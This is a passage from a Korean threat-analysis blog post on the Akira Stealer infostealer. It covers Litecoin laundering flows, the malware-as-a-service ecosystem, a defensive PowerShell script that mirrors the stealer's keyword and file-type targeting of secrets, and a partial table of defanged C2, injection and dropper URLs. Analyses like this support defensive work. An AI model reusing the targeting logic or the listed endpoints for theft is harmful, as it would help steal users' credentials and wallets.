클러스터링 알고리즘이 흔히 적용하는 휴리스틱을 우회합니다. 전체적인 의도는 고엔트로피 거래 흐름을 만들어 귀속을 혼란시키고 연결 가능성을 교란하는 것이며, 특히 자금이 결국 다른 자산으로 브리지되거나 프라이버시 중심 코인으로 교환될 때 그렇습니다.",[532,11097,11098],{},"아래 예시에서, 우리는 이 동작의 구조화된 부분 집합을 보여 줍니다. 수신 거래는 개별 피해자 전송을 나타냅니다. 이 값들은 이후 아웃바운드 흐름에 완벽하게 매핑되어, 코인이 빠르고 예측 가능하며 알고리즘적으로 분할된 지급을 통해 \"세탁\"되는 모습을 보여 줍니다.",[1391,11100,4680,11103],{"className":11101,"style":4679},[11102],"font-size-1",[1407,11104,11105,4680,11128,4680,11161,4680,11189,4680,11218],{},[1397,11106,4685,11107,4685,11111,4685,11115,4685,11118,4685,11122,4685,11125,4680],{},[1400,11108,11110],{"style":11109},"text-align: left; width: 14%;","입력 소스",[1400,11112,11114],{"style":11113},"text-align: left; width: 12%;","입력 날짜",[1400,11116,11117],{"style":11109},"입금액 (LTC)",[1400,11119,11121],{"style":11120},"text-align: left; width: 20%;","→ 공격자 지갑",[1400,11123,11124],{"style":6299},"출력 주소",[1400,11126,11127],{"style":4850},"총 출금 (LTC)",[1397,11129,4685,11130,4685,11133,4685,11136,4685,11139,4685,11146,4685,11159,4680],{},[1412,11131,11132],{},"Input_1",[1412,11134,11135],{},"2024-09-21",[1412,11137,11138],{},"0.25339198",[1412,11140,11141,11142,4685],{},"\n      ",[1679,11143,11145],{"title":11144},"LLQtaBnSAFpCFUw5cXRRka7Nvtrs4Up9bH","LLQtaBnSAF...",[1412,11147,11148,11149,11152,11153,11148,11155,11158],{},"\n      - ",[550,11150,11151],{},"LZmHkgkED..."," (0.15579078, 2024-09-26)",[696,11154],{},[550,11156,11157],{},"M8JpDsw5H7..."," (0.09760120, 2024-09-26)\n    ",[1412,11160,11138],{},[1397,11162,4685,11163,4685,11166,4685,11169,4685,11172,4685,11176,4685,11187,4680],{"style":4706},[1412,11164,11165],{},"Input_2",[1412,11167,11168],{},"2024-04-16",[1412,11170,11171],{},"1.09976044",[1412,11173,11141,11174,4685],{},[1679,11175,11145],{"title":11144},[1412,11177,11148,11178,11181,11182,11148,11184,11186],{},[550,11179,11180],{},"LgWrCAF8ED..."," (0.84304664, 2024-06-13)",[696,11183],{},[550,11185,11180],{}," (0.25671380, 2024-06-13)\n    ",[1412,11188,11171],{},[1397,11190,4685,11191,4685,11194,4685,11197,4685,11200,4685,11204,4685,11216,4680],{},[1412,11192,11193],{},"Input_3",[1412,11195,11196],{},"2024-03-06",[1412,11198,11199],{},"0.77089346",[1412,11201,11141,11202,4685],{},[1679,11203,11145],{"title":11144},[1412,11205,11148,11206,11209,11210,11148,11212,11215],{},[550,11207,11208],{},"LZL3wQcSRP..."," (0.38544673, 2024-03-04)",[696,11211],{},[550,11213,11214],{},"M8kiBpVHG3..."," (0.38544673, 2024-03-04)\n    ",[1412,11217,11199],{},[1397,11219,4685,11220,4685,11223,4685,11225,4685,11227,4685,11231,4685,11241,4680],{"style":4706},[1412,11221,11222],{},"Input_4",[1412,11224,11196],{},[1412,11226,11199],{},[1412,11228,11141,11229,4685],{},[1679,11230,11145],{"title":11144},[1412,11232,11148,11233,11209,11236,11148,11238,11215],{},[550,11234,11235],{},"LUFLTrqYpix...",[696,11237],{},[550,11239,11240],{},"La22dfH9eM...",[1412,11242,11199],{},[826,11244],{"className":11245},[829,830],[528,11247,11249],{"id":11248},"_10-akira-생태계-들여다보기-상업화된-사이버범죄-인프라","10. Akira 생태계 들여다보기 – 상업화된 사이버범죄 인프라",[532,11251,534],{},[532,11253,11254],{},"Akira는 단지 스틸러가 아닙니다. 사이버범죄를 단순화하고, 확장하며, 수익화하도록 설계된 번성하는 지하 생태계의 핵심입니다.",[713,11256,11258],{"id":11257},"_101-위협-행위자를-위한-플러그-앤-플레이-생태계","10.1 위협 행위자를 위한 플러그 앤 플레이 생태계",[532,11260,719],{},[532,11262,11263],{},"Akira 생태계는 사이버범죄가 전문화되고 서비스 주도적인 경제로 진화한 모습을 잘 보여 줍니다. 여기에는 다음이 포함됩니다:",[603,11265,11266,11276,11282,11288,11294],{},[606,11267,11268,11269,11272,11273,2013],{},"온디맨드 페이로드 생성을 위한 ",[539,11270,11271],{},"빌더 봇","(예: ",[550,11274,11275],{},"@AkiraRedBot",[606,11277,11278,11279],{},"업데이트, 기능 요청, 고객 지원을 위한 ",[539,11280,11281],{},"Telegram 채널",[606,11283,11284,11285],{},"종종 다이렉트 메시지나 Sellix 같은 익명 전자상거래 플랫폼을 통한 ",[539,11286,11287],{},"자동화된 라이선싱 및 결제 처리",[606,11289,11290,11291],{},"클립보드 하이재커, Discord 토큰 로거, 브라우저 데이터 스틸러, 심지어 랜섬웨어 애드온 같은 ",[539,11292,11293],{},"번들 모듈",[606,11295,11296,11297],{},"토글, 웹훅 입력, 아이콘 브랜딩을 허용하는 구성 인터페이스가 있는 ",[539,11298,11299],{},"맞춤형 페이로드",[532,11301,11302],{},[747,11303],{"alt":11304,"src":11305},"Akira Stealer","https://res.cloudinary.com/c4a8/image/upload/v1749797420/blog/pics/akira-stealer-v2.jpg",[713,11307,11309],{"id":11308},"_102-사이버범죄의-상업화","10.2 사이버범죄의 상업화",[532,11311,719],{},[532,11313,11314],{},"Akira의 구조는 \"멀웨어 서비스형(MaaS)\"으로의 더 넓은 움직임을 반영하며, 여기서는:",[603,11316,11317,11323,11329,11335],{},[606,11318,11319,11320],{},"공격을 개시하는 데 ",[539,11321,11322],{},"깊은 기술적 역량이 필요 없습니다",[606,11324,11325,11328],{},[539,11326,11327],{},"낮은 진입 비용","(3개월 $75, 평생 $150)",[606,11330,11331,11332],{},"Telegram을 통한 ",[539,11333,11334],{},"즉각적인 지원 및 문서화",[606,11336,11337,11340],{},[539,11338,11339],{},"커뮤니티 기여","가 정기적으로 스크립트와 기능 제안으로 Akira를 확장합니다",[532,11342,11343],{},"이 생태계는 변경 로그, UX 개선, 가격 계층, 업셀 등 정상적인 SaaS 비즈니스 모델을 그대로 닮았습니다.",[532,11345,11346],{},[747,11347],{"alt":11348,"src":11349},"Akria Stealer","https://res.cloudinary.com/c4a8/image/upload/v1749797061/blog/pics/akira-stealer.jpg",[713,11351,11353],{"id":11352},"_103-스틸러를-넘어-생태계의-구성-요소","10.3 스틸러를 넘어 – 생태계의 구성 요소",[532,11355,719],{},[532,11357,11358,11360],{},[550,11359,584],{},"가 많은 공격의 심장이지만, 이 생태계는 완전한 체인을 제공합니다:",[603,11362,11363,11366,11369,11372,11375],{},[606,11364,11365],{},"PyInstaller 래퍼 같은 난독화 도구",[606,11367,11368],{},"악성 페이로드를 무해한 소프트웨어와 결합하는 파일 바인더",[606,11370,11371],{},"컴파일러, 크립터, 런타임 다형성",[606,11373,11374],{},"페이로드 전달 및 유출을 위한 호스팅 미러(예: GoFile, AnonFiles)",[606,11376,11377],{},"탈취된 자격 증명과 하드웨어 프로필을 요약하는 데이터 관리 봇",[532,11379,11380],{},[747,11381],{"alt":11382,"src":11383},"Akira Bot","https://res.cloudinary.com/c4a8/image/upload/v1749797107/blog/pics/akira-bot.jpg",[528,11385,11387],{"id":11386},"_11-akira-stealer-quickcheck-영향받은-파일","11. Akira Stealer QuickCheck 영향받은 파일",[532,11389,534],{},[713,11391,11393],{"id":11392},"_111-무엇을-위한-것인가","11.1 무엇을 위한 것인가?",[532,11395,719],{},[532,11397,11398,11399,619,11402,619,11405,619,11408,11411],{},"Akira Stealer 감염이 의심된 후에는, 시스템의 어떤 파일이 유출 위험에 처했는지 즉시 아는 것이 중요합니다. 위에 개괄된 QuickCheck PowerShell 스크립트는 Akira의 정확한 검색 로직을 복제합니다. 사용자의 ",[539,11400,11401],{},"Desktop",[539,11403,11404],{},"Documents",[539,11406,11407],{},"Downloads",[539,11409,11410],{},"OneDrive"," 폴더에서 다음 조건에 해당하는 파일을 스캔합니다:",[603,11413,11414,11430,11433],{},[606,11415,11416,11417,619,11420,619,11423,619,11426,11429],{},"파일명에 ",[550,11418,11419],{},"password",[550,11421,11422],{},"wallet",[550,11424,11425],{},"backup",[550,11427,11428],{},"token"," 같은 민감한 키워드를 포함",[606,11431,11432],{},"흔히 표적이 되는 특정 확장자(.txt, .docx, .pdf, .jpg 등)를 가짐",[606,11434,11435],{},"멀웨어가 부과한 2 MB 크기 제한 이하",[532,11437,11438,11439,11442],{},"QuickCheck는 Akira Stealer의 내부 로직에 기반한 신속한 개관을 제공하지만, 포괄적인 포렌식 도구나 전문적인 인시던트 대응을 ",[539,11440,11441],{},"대체하지는 않습니다",". 확인된 침해를 다룰 때는 항상 더 깊은 분석으로 후속 조치를 취하십시오.",[532,11444,11445,11446,619,11449,619,11452,619,11455,11458],{},"이후 ",[539,11447,11448],{},"파일명",[539,11450,11451],{},"상대 경로",[539,11453,11454],{},"크기 (KB)",[539,11456,11457],{},"트리거 키워드","로 정렬된 표를 제시합니다.",[820,11460,11461],{},[532,11462,11463,11466,11467,11470,11471,11474],{},[539,11464,11465],{},"면책 조항","\n이 도구는 완전성이나 특정 목적 적합성에 대한 어떤 보증 없이 ",[539,11468,11469],{},"\"있는 그대로\""," 제공됩니다. 잠재적으로 민감한 ",[539,11472,11473],{},"모든"," 파일의 탐지를 보장하지 않으며, 완전한 멀웨어 포렌식을 대체하지도 않습니다. 사용에 따른 위험은 본인이 부담합니다.",[826,11476],{"className":11477},[829],[713,11479,514],{"id":11480},"법적-고지",[532,11482,719],{},[532,11484,11485,11486,11489,11490,2121],{},"이 QuickCheck 유틸리티는 ",[539,11487,11488],{},"방어적 보안"," 평가 전용입니다. 소유하지 않은 시스템에 대한 무단 스캔이나 사용은 프라이버시, 저작권, 컴퓨터 오용 관련 법률을 위반할 수 있습니다. glueckkanja AG는 그 사용으로 인한 오용이나 손해에 대해 ",[539,11491,11492],{},"어떠한 책임도 지지 않습니다",[713,11494,11496],{"id":11495},"powershell-스크립트","PowerShell 스크립트",[532,11498,719],{},[587,11500,11502],{"className":1673,"code":11501,"language":1675,"meta":593,"style":593},"\u003C#\n.SYNOPSIS\n    QuickCheck: Lists all files that Akira Stealer would potentially exfiltrate.\n\n.DESCRIPTION\n    Scans Desktop, Documents, Downloads and OneDrive for files that:\n      • Contain one of the defined keywords in their name\n      • Have an allowed file extension\n      • Are not larger than 2 MB\n    Presents the results in a colored, tabular overview.\n\n.NOTES\n    © glueckkanja AG – Kaiserstr. 39 · 63065 Offenbach\n#>\n\n# -------------------------------------\n# 1. Configuration\n# -------------------------------------\n$scanFolders = @(\n    \"$env:USERPROFILE\\Desktop\",\n    \"$env:USERPROFILE\\Documents\",\n    \"$env:USERPROFILE\\Downloads\",\n    \"$env:USERPROFILE\\OneDrive\"\n)\n$keywords   = 'passw','seed','mnemo','phrase','login','wallet','crypto','token','backup','secret','account'\n$extensions = '.txt','.doc','.docx','.pdf','.csv','.xls','.xlsx','.jpg','.png'\n$maxSize    = 2MB\n\n# -------------------------------------\n# 2. Scan and Collect Matches\n# -------------------------------------\n$matches = [System.Collections.Generic.List[PSObject]]::new()\n\nforeach ($folder in $scanFolders) {\n    if (-not (Test-Path $folder)) { continue }\n    Get-ChildItem -Path $folder -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {\n        # 2.1 Extension filter\n        if ($extensions -notcontains $_.Extension.ToLower()) { return }\n        # 2.2 Size filter\n        if ($_.Length -gt $maxSize) { return }\n\n        # 2.3 Keyword filter: explicit loop to avoid null-method calls\n        $hit = $null\n        foreach ($kw in $keywords) {\n            if ($_.Name.ToLower().Contains($kw)) {\n                $hit = $kw\n                break\n            }\n        }\n        if (-not $hit) { return }\n\n        # 2.4 Build relative path\n        $rel = $_.DirectoryName.Substring($env:USERPROFILE.Length + 1)\n\n        # 2.5 Collect\n        $matches.Add([PSCustomObject]@{\n            FileName    = $_.Name\n            Location    = $rel\n            'Size (KB)' = [math]::Round($_.Length / 1KB, 1)\n            Keyword     = $hit\n        })\n    }\n}\n\n# -------------------------------------\n# 3. Display Results\n# -------------------------------------\nclear\nWrite-Host \"🔍 glueckkanja AG – Akira Stealer QuickCheck\" -ForegroundColor Cyan\nWrite-Host \"────────────────────────────────────────────────────────\" -ForegroundColor DarkCyan\n\nif ($matches.Count -gt 0) {\n    $matches |\n        Sort-Object Location, FileName |\n        Format-Table -AutoSize `\n            @{Label='File';       Expression={$_.FileName}},\n            @{Label='Location';   Expression={$_.Location}},\n            @{Label='Size (KB)';  Expression={$_. 'Size (KB)'}},\n            @{Label='Keyword';    Expression={$_.Keyword}}\n\n    Write-Host \"`n⚠️  Total potential matches: $($matches.Count)\" -ForegroundColor Yellow\n}\nelse {\n    Write-Host \"✅ No potentially compromised files found.\" -ForegroundColor Green\n}\nWrite-Host \"`n© glueckkanja AG · Kaiserstr. 39 · 63065 Offenbach\" -ForegroundColor DarkGray\nWrite-Host \"Disclaimer: This tool offers a high-level scan based on Akira Stealer’s logic; it does not replace full forensic analysis.\" -ForegroundColor DarkGray\n",[550,11503,11504,11509,11514,11519,11523,11528,11533,11538,11543,11548,11553,11557,11562,11567,11572,11576,11581,11586,11590,11595,11600,11605,11610,11615,11619,11624,11629,11634,11638,11642,11647,11651,11656,11660,11665,11670,11675,11680,11685,11690,11695,11699,11704,11709,11714,11719,11724,11729,11734,11739,11744,11748,11753,11758,11762,11767,11772,11777,11782,11787,11792,11797,11802,11806,11810,11814,11819,11823,11828,11833,11838,11842,11847,11852,11857,11862,11867,11872,11877,11883,11888,11894,11899,11905,11911,11916,11922],{"__ignoreMap":593},[1679,11505,11506],{"class":1681,"line":1682},[1679,11507,11508],{},"\u003C#\n",[1679,11510,11511],{"class":1681,"line":2059},[1679,11512,11513],{},".SYNOPSIS\n",[1679,11515,11516],{"class":1681,"line":2065},[1679,11517,11518],{},"    QuickCheck: Lists all files that Akira Stealer would potentially exfiltrate.\n",[1679,11520,11521],{"class":1681,"line":2071},[1679,11522,3845],{"emptyLinePlaceholder":325},[1679,11524,11525],{"class":1681,"line":2393},[1679,11526,11527],{},".DESCRIPTION\n",[1679,11529,11530],{"class":1681,"line":2399},[1679,11531,11532],{},"    Scans Desktop, Documents, Downloads and OneDrive for files that:\n",[1679,11534,11535],{"class":1681,"line":3055},[1679,11536,11537],{},"      • Contain one of the defined keywords in their name\n",[1679,11539,11540],{"class":1681,"line":3848},[1679,11541,11542],{},"      • Have an allowed file extension\n",[1679,11544,11545],{"class":1681,"line":3854},[1679,11546,11547],{},"      • Are not larger than 2 MB\n",[1679,11549,11550],{"class":1681,"line":4103},[1679,11551,11552],{},"    Presents the results in a colored, tabular overview.\n",[1679,11554,11555],{"class":1681,"line":5028},[1679,11556,3845],{"emptyLinePlaceholder":325},[1679,11558,11559],{"class":1681,"line":5034},[1679,11560,11561],{},".NOTES\n",[1679,11563,11564],{"class":1681,"line":5040},[1679,11565,11566],{},"    © glueckkanja AG – Kaiserstr. 39 · 63065 Offenbach\n",[1679,11568,11569],{"class":1681,"line":5046},[1679,11570,11571],{},"#>\n",[1679,11573,11574],{"class":1681,"line":5052},[1679,11575,3845],{"emptyLinePlaceholder":325},[1679,11577,11578],{"class":1681,"line":5058},[1679,11579,11580],{},"# -------------------------------------\n",[1679,11582,11583],{"class":1681,"line":5064},[1679,11584,11585],{},"# 1. Configuration\n",[1679,11587,11588],{"class":1681,"line":5070},[1679,11589,11580],{},[1679,11591,11592],{"class":1681,"line":5076},[1679,11593,11594],{},"$scanFolders = @(\n",[1679,11596,11597],{"class":1681,"line":5082},[1679,11598,11599],{},"    \"$env:USERPROFILE\\Desktop\",\n",[1679,11601,11602],{"class":1681,"line":5088},[1679,11603,11604],{},"    \"$env:USERPROFILE\\Documents\",\n",[1679,11606,11607],{"class":1681,"line":5094},[1679,11608,11609],{},"    \"$env:USERPROFILE\\Downloads\",\n",[1679,11611,11612],{"class":1681,"line":5100},[1679,11613,11614],{},"    \"$env:USERPROFILE\\OneDrive\"\n",[1679,11616,11617],{"class":1681,"line":5106},[1679,11618,5246],{},[1679,11620,11621],{"class":1681,"line":5112},[1679,11622,11623],{},"$keywords   = 'passw','seed','mnemo','phrase','login','wallet','crypto','token','backup','secret','account'\n",[1679,11625,11626],{"class":1681,"line":5778},[1679,11627,11628],{},"$extensions = '.txt','.doc','.docx','.pdf','.csv','.xls','.xlsx','.jpg','.png'\n",[1679,11630,11631],{"class":1681,"line":5783},[1679,11632,11633],{},"$maxSize    = 2MB\n",[1679,11635,11636],{"class":1681,"line":5788},[1679,11637,3845],{"emptyLinePlaceholder":325},[1679,11639,11640],{"class":1681,"line":5793},[1679,11641,11580],{},[1679,11643,11644],{"class":1681,"line":5799},[1679,11645,11646],{},"# 2. Scan and Collect Matches\n",[1679,11648,11649],{"class":1681,"line":5804},[1679,11650,11580],{},[1679,11652,11653],{"class":1681,"line":5809},[1679,11654,11655],{},"$matches = [System.Collections.Generic.List[PSObject]]::new()\n",[1679,11657,11658],{"class":1681,"line":5814},[1679,11659,3845],{"emptyLinePlaceholder":325},[1679,11661,11662],{"class":1681,"line":5819},[1679,11663,11664],{},"foreach ($folder in $scanFolders) {\n",[1679,11666,11667],{"class":1681,"line":5824},[1679,11668,11669],{},"    if (-not (Test-Path $folder)) { continue }\n",[1679,11671,11672],{"class":1681,"line":5829},[1679,11673,11674],{},"    Get-ChildItem -Path $folder -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {\n",[1679,11676,11677],{"class":1681,"line":5835},[1679,11678,11679],{},"        # 2.1 Extension filter\n",[1679,11681,11682],{"class":1681,"line":5841},[1679,11683,11684],{},"        if ($extensions -notcontains $_.Extension.ToLower()) { return }\n",[1679,11686,11687],{"class":1681,"line":5847},[1679,11688,11689],{},"        # 2.2 Size filter\n",[1679,11691,11692],{"class":1681,"line":5852},[1679,11693,11694],{},"        if ($_.Length -gt $maxSize) { return }\n",[1679,11696,11697],{"class":1681,"line":5857},[1679,11698,3845],{"emptyLinePlaceholder":325},[1679,11700,11701],{"class":1681,"line":5862},[1679,11702,11703],{},"        # 2.3 Keyword filter: explicit loop to avoid null-method calls\n",[1679,11705,11706],{"class":1681,"line":5867},[1679,11707,11708],{},"        $hit = $null\n",[1679,11710,11711],{"class":1681,"line":5873},[1679,11712,11713],{},"        foreach ($kw in $keywords) {\n",[1679,11715,11716],{"class":1681,"line":5878},[1679,11717,11718],{},"            if ($_.Name.ToLower().Contains($kw)) {\n",[1679,11720,11721],{"class":1681,"line":5883},[1679,11722,11723],{},"                $hit = $kw\n",[1679,11725,11726],{"class":1681,"line":5888},[1679,11727,11728],{},"                break\n",[1679,11730,11731],{"class":1681,"line":5893},[1679,11732,11733],{},"            }\n",[1679,11735,11736],{"class":1681,"line":5898},[1679,11737,11738],{},"        }\n",[1679,11740,11741],{"class":1681,"line":5903},[1679,11742,11743],{},"        if (-not $hit) { return }\n",[1679,11745,11746],{"class":1681,"line":5909},[1679,11747,3845],{"emptyLinePlaceholder":325},[1679,11749,11750],{"class":1681,"line":5915},[1679,11751,11752],{},"        # 2.4 Build relative path\n",[1679,11754,11755],{"class":1681,"line":5921},[1679,11756,11757],{},"        $rel = $_.DirectoryName.Substring($env:USERPROFILE.Length + 1)\n",[1679,11759,11760],{"class":1681,"line":5927},[1679,11761,3845],{"emptyLinePlaceholder":325},[1679,11763,11764],{"class":1681,"line":5932},[1679,11765,11766],{},"        # 2.5 Collect\n",[1679,11768,11769],{"class":1681,"line":5937},[1679,11770,11771],{},"        $matches.Add([PSCustomObject]@{\n",[1679,11773,11774],{"class":1681,"line":5943},[1679,11775,11776],{},"            FileName    = $_.Name\n",[1679,11778,11779],{"class":1681,"line":5949},[1679,11780,11781],{},"            Location    = $rel\n",[1679,11783,11784],{"class":1681,"line":5955},[1679,11785,11786],{},"            'Size (KB)' = [math]::Round($_.Length / 1KB, 1)\n",[1679,11788,11789],{"class":1681,"line":5961},[1679,11790,11791],{},"            Keyword     = $hit\n",[1679,11793,11794],{"class":1681,"line":5966},[1679,11795,11796],{},"        })\n",[1679,11798,11799],{"class":1681,"line":5971},[1679,11800,11801],{},"    }\n",[1679,11803,11804],{"class":1681,"line":5977},[1679,11805,2402],{},[1679,11807,11808],{"class":1681,"line":5982},[1679,11809,3845],{"emptyLinePlaceholder":325},[1679,11811,11812],{"class":1681,"line":5987},[1679,11813,11580],{},[1679,11815,11816],{"class":1681,"line":5993},[1679,11817,11818],{},"# 3. Display Results\n",[1679,11820,11821],{"class":1681,"line":5999},[1679,11822,11580],{},[1679,11824,11825],{"class":1681,"line":6005},[1679,11826,11827],{},"clear\n",[1679,11829,11830],{"class":1681,"line":6010},[1679,11831,11832],{},"Write-Host \"🔍 glueckkanja AG – Akira Stealer QuickCheck\" -ForegroundColor Cyan\n",[1679,11834,11835],{"class":1681,"line":6016},[1679,11836,11837],{},"Write-Host \"────────────────────────────────────────────────────────\" -ForegroundColor DarkCyan\n",[1679,11839,11840],{"class":1681,"line":6022},[1679,11841,3845],{"emptyLinePlaceholder":325},[1679,11843,11844],{"class":1681,"line":6027},[1679,11845,11846],{},"if ($matches.Count -gt 0) {\n",[1679,11848,11849],{"class":1681,"line":6033},[1679,11850,11851],{},"    $matches |\n",[1679,11853,11854],{"class":1681,"line":6039},[1679,11855,11856],{},"        Sort-Object Location, FileName |\n",[1679,11858,11859],{"class":1681,"line":6044},[1679,11860,11861],{},"        Format-Table -AutoSize `\n",[1679,11863,11864],{"class":1681,"line":6049},[1679,11865,11866],{},"            @{Label='File';       Expression={$_.FileName}},\n",[1679,11868,11869],{"class":1681,"line":6054},[1679,11870,11871],{},"            @{Label='Location';   Expression={$_.Location}},\n",[1679,11873,11874],{"class":1681,"line":6060},[1679,11875,11876],{},"            @{Label='Size (KB)';  Expression={$_. 'Size (KB)'}},\n",[1679,11878,11880],{"class":1681,"line":11879},79,[1679,11881,11882],{},"            @{Label='Keyword';    Expression={$_.Keyword}}\n",[1679,11884,11886],{"class":1681,"line":11885},80,[1679,11887,3845],{"emptyLinePlaceholder":325},[1679,11889,11891],{"class":1681,"line":11890},81,[1679,11892,11893],{},"    Write-Host \"`n⚠️  Total potential matches: $($matches.Count)\" -ForegroundColor Yellow\n",[1679,11895,11897],{"class":1681,"line":11896},82,[1679,11898,2402],{},[1679,11900,11902],{"class":1681,"line":11901},83,[1679,11903,11904],{},"else {\n",[1679,11906,11908],{"class":1681,"line":11907},84,[1679,11909,11910],{},"    Write-Host \"✅ No potentially compromised files found.\" -ForegroundColor Green\n",[1679,11912,11914],{"class":1681,"line":11913},85,[1679,11915,2402],{},[1679,11917,11919],{"class":1681,"line":11918},86,[1679,11920,11921],{},"Write-Host \"`n© glueckkanja AG · Kaiserstr. 39 · 63065 Offenbach\" -ForegroundColor DarkGray\n",[1679,11923,11925],{"class":1681,"line":11924},87,[1679,11926,11927],{},"Write-Host \"Disclaimer: This tool offers a high-level scan based on Akira Stealer’s logic; it does not replace full forensic analysis.\" -ForegroundColor DarkGray\n",[826,11929],{"className":11930},[829,830],[528,11932,11934],{"id":11933},"_12-대응을-넘어-glueckkanja-csoc가-인시던트를-인사이트로-바꾸는-방법","12. 대응을 넘어 – glueckkanja CSOC가 인시던트를 인사이트로 바꾸는 방법",[532,11936,534],{},[532,11938,11939,11940],{},"대부분의 보안 운영 센터는 봉쇄에서 멈춥니다.\n",[539,11941,11942],{},"우리는 그렇지 않습니다.",[532,11944,11945],{},"glueckkanja CSOC에서 우리는 인시던트 대응이 결승선이 아니라 출발점이라고 믿습니다.",[532,11947,11948],{},"다른 이들이 승리를 선언하고 넘어갈 때, 우리는 더 깊이 파고듭니다. 우리에게 모든 인시던트는 배우고, 적응하며, 더 강해지는 기회입니다. 수년간의 깊은 포렌식 전문성과 리버스 엔지니어링 역량으로 뒷받침되는 우리의 끊임없는 호기심은, 우리가 단지 방어하는 데 그치지 않고 예측하도록 보장합니다.",[532,11950,11951,11952,11955],{},"이 철학이 우리가 ",[539,11953,11954],{},"Akira Compromise Reporter","를 구축한 이유입니다.",[532,11957,11958],{},"기본적인 탐지를 훨씬 넘어, 이 내부 개발 포렌식 도구는 Akira Stealer에 대한 우리의 깊은 지식을 사용하여 어떤 데이터가 침해되었는지에 대한 절대적인 명확성을 제공합니다. 몇 분 안에, 인시던트의 전체 영향에 대한 정밀하고 실행 가능한 스냅샷을 생성합니다:",[603,11960,11961,11964,11967],{},[606,11962,11963],{},"정확히 어떤 자격 증명, 토큰, 브라우저 세션이 탈취되었는지.",[606,11965,11966],{},"정확히 어떤 암호화폐 지갑, 메시징 계정, 파일이 노출되었는지.",[606,11968,11969],{},"명확하고 구조화된 상세 포렌식 보고서. 불확실성을 즉각적이고 정보에 기반한 조치로 전환합니다.",[532,11971,11972],{},[747,11973],{"alt":11974,"src":11975},"Akira Compromise Report","https://res.cloudinary.com/c4a8/image/upload/v1749796758/blog/pics/akira-compromise-report.png",[532,11977,11978],{},"glueckkanja에서 우리는 성공을 단지 차단한 위협의 수가 아니라 제공한 명확성으로 측정하기 때문입니다. 제대로 된 사이버보안은 단순히 인시던트에 반응하는 것이 아니라, 이해하고, 적응하며, 항상 한 걸음 앞서 있는 것입니다.",[532,11980,11981],{},[539,11982,11983],{},"그것이 glueckkanja CSOC의 차이입니다.",[528,11985,11987],{"id":11986},"_13-침해-지표-iocs","13. 침해 지표 (IOCs)",[532,11989,534],{},[532,11991,11992],{},"아래는 glueckkanja CSOC의 내부 리버스 엔지니어링 과정에서 멀웨어 코드로부터 직접 추출한 포괄적이고 원문 그대로의 IOC 모음입니다. 어떤 추측이나 외부 위협 인텔리전스 소스도 사용되지 않았습니다. 모든 지표는 확인된 발견 사항입니다. 모든 URL은 실수로 클릭하는 것을 방지하기 위해 의도적으로 난독화되었습니다.",[532,11994,11995],{},[539,11996,11997],{},"약어:",[603,11999,12000,12006],{},[606,12001,12002,12005],{},[539,12003,12004],{},"TG:"," Telegram 보고 채널",[606,12007,12008,12011],{},[539,12009,12010],{},"Alt:"," 대체(폴백) 엔드포인트",[713,12013,12015],{"id":12014},"_1-도메인-및-url","1. 도메인 및 URL",[532,12017,719],{},[1391,12019,4680,12021],{"className":12020,"style":4679},[11102],[1407,12022,12023,4680,12035,4680,12048,4680,12061,4680,12074,4680,12087,4680,12100,4680,12113,4680,12129,4680,12145,4680,12158,4680,12171,4680,12184,4680,12197,4680,12210,4680,12223,4680,12236,4680,12249,4680,12262,4680,12275,4680,12289,4680,12302],{},[1397,12024,4685,12025,4685,12029,4685,12033,4680],{},[1400,12026,12028],{"style":12027},"text-align: left; width: 18%;","범주",[1400,12030,12032],{"style":12031},"text-align: left; width: 52%;","난독화된 URL",[1400,12034,4857],{"style":4850},[1397,12036,4685,12037,4685,12040,4685,12045,4680],{},[1412,12038,12039],{},"기본 인젝션",[1412,12041,12042],{},[550,12043,12044],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/inj[.]php",[1412,12046,12047],{},"최초 공격자 웹훅 엔드포인트",[1397,12049,4685,12050,4685,12053,4685,12058,4680],{"style":4706},[1412,12051,12052],{},"대체 인젝션",[1412,12054,12055],{},[550,12056,12057],{},"https[:]//cosmoplanets[.]net/.well-known/pki-validation/inj[.]php",[1412,12059,12060],{},"대체 인젝터 엔드포인트",[1397,12062,4685,12063,4685,12066,4685,12071,4680],{},[1412,12064,12065],{},"오류 보고 (TG)",[1412,12067,12068],{},[550,12069,12070],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/link[.]php",[1412,12072,12073],{},"Telegram 오류/로그 보고 URL",[1397,12075,4685,12076,4685,12079,4685,12084,4680],{"style":4706},[1412,12077,12078],{},"오류 보고 (Alt)",[1412,12080,12081],{},[550,12082,12083],{},"https[:]//cosmoplanets[.]net/.well-known/pki-validation/link[.]php",[1412,12085,12086],{},"대체 오류/로그 보고 URL",[1397,12088,4685,12089,4685,12092,4685,12097,4680],{},[1412,12090,12091],{},"배니티 봇 (TG)",[1412,12093,12094],{},[550,12095,12096],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/mumu[.]php",[1412,12098,12099],{},"배니티 주소 알림 엔드포인트",[1397,12101,4685,12102,4685,12105,4685,12110,4680],{"style":4706},[1412,12103,12104],{},"배니티 봇 (Alt)",[1412,12106,12107],{},[550,12108,12109],{},"https[:]//cosmoplanets[.]net/well-known/pki-validation/mumu[.]php",[1412,12111,12112],{},"대체 배니티 알림 엔드포인트",[1397,12114,4685,12115,4685,12118,4685,12123,4680],{},[1412,12116,12117],{},"Exodus 인젝션",[1412,12119,12120],{},[550,12121,12122],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/exodus[.]asar",[1412,12124,12125,12126,12128],{},"Electron ",[550,12127,4581],{}," 앱 모듈",[1397,12130,4685,12131,4685,12134,4685,12139,4680],{"style":4706},[1412,12132,12133],{},"Atomic 인젝션",[1412,12135,12136],{},[550,12137,12138],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/atomic[.]asar",[1412,12140,12125,12141,12144],{},[550,12142,12143],{},"AtomicWallet"," 모듈",[1397,12146,4685,12147,4685,12150,4685,12155,4680],{},[1412,12148,12149],{},"Updater 다운로드",[1412,12151,12152],{},[550,12153,12154],{},"https[:]//hentaikawaiiuwu[.]com/.well-known/pki-validation/Updater[.]exe",[1412,12156,12157],{},"지속성 드로퍼 실행 파일",[1397,12159,4685,12160,4685,12163,4685,12168,4680],{"style":4706},[1412,12161,12162],{},"Gofile API 목록",[1412,12164,12165],{},[550,12166,12167],{},"https[:]//api.gofile[.]io/servers",[1412,12169,12170],{},"최적의 GoFile 업로드 서버 